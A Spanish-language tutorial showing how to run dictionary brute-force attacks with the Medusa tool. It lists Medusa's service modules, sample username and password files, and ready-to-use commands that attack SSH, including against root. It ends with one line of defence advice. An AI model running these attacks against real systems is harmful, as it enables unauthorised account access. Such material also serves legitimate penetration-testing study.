Cómo realizar ataques de fuerza bruta con diccionarios

Cómo realizar ataques de fuerza bruta con diccionarios

Un ataque de fuerza bruta es la forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso.

El login de una web tambien puede ser atacado con Medusa

Medusa es un software para atacar a nivel de fuerza bruta basándonos en diccionarios de palabras, es muy estable, sencillo, rápido y nos permitirá realizar el ataque a muchos servicios.

Este programa lo podemos encontrar en los repositorios de nuestra distribución con el nombre Medusa, si no es así podemos dirigirnos a la pagina oficial del proyecto.

Instalamos Medusa:

apt-get install medusa

Revisamos los servicios a los que podemos realizar ataques de fuerza bruta con Medusa:

medusa -dAvailable modules in "/usr/lib/medusa/modules" :+ afp.mod : Brute force module for AFP sessions : version 0.9.0+ cvs.mod : Brute force module for CVS sessions : version 1.0.0+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0+ http.mod : Brute force module for HTTP : version 1.3.0+ imap.mod : Brute force module for IMAP sessions : version 1.2.0+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1+ mysql.mod : Brute force module for MySQL sessions : version 1.2+ ncp.mod : Brute force module for NCP sessions : version 1.0.0+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2+ pop3.mod : Brute force module for POP3 sessions : version 1.2+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2+ rsh.mod : Brute force module for RSH sessions : version 1.0.1+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2+ svn.mod : Brute force module for Subversion sessions : version 1.0.0+ telnet.mod : Brute force module for telnet sessions : version 1.2.2+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1+ vnc.mod : Brute force module for VNC sessions : version 1.0.1+ web-form.mod : Brute force module for web forms : version 1.0.0+ wrapper.mod : Generic Wrapper Module : version 1.0.1

Crear los diccionarios de usuarios y password

Crear el fichero usuarios.txt con el siguiente contenido:

 admin Admin Root root Administrdor administrador Administrator administrator

Crear el fichero password.txt, con el siguiente contenido:

123443211234567887654321clavepassword

Parámetros importantes de Medusa

-h : El host al cual le vamos a realizar el ataque

-H : Para especificar una lista de hosts

-u : Usuario al que le vamos a realizar el ataque

-U : Para especificar una lista de usuarios

-P : Para especificar una lista de contraseñas

-O : Crea un log

-e : Incluye la verificación con un password vacío y que el password sea el mismo nombre

-M : El modulo que deseamos emplear (sin la extension .mod)

-n : Para especificar el puerto del servicio (En caso de que no este corriendo en el default)

-s : Habilita ssl

-f : Se detiene al encontrar la contraseña

-b : Suprime los banners

-v : Modo verbose (mas información level de 0 a 6, siendo el 6 mas alto)

Conociendo estos parámetros, procedemos a realizar un ataque de fuerza bruta a un equipo que tiene corriendo el servicio de ssh:

medusa -h IP_ORDENADOR -U usuarios.txt -P password.txt -M ssh -f -b -v 6 -e ns

En el caso que ya conociéramos el usuario, sería así:

medusa -h IP_ORDENADOR -u root -P password.txt -M ssh -f -b -v 6 -e ns

Para encontrar que servicios y en que puertos se esta ejecutando en determinado equipo debemos utilizar otras herramientas como Nmap.

Podemos ir armando nuestros propios diccionarios, también en Internet se pueden encontrar listado de diccionarios con claves y usuario comunes.

La mejor forma de defendernos de este tipo de programas es restringir el numero de intentos de autentificación, y tener una compleja combinación de usuario/contraseña.

Para ti
Queremos saber tu opinión. ¡Comenta!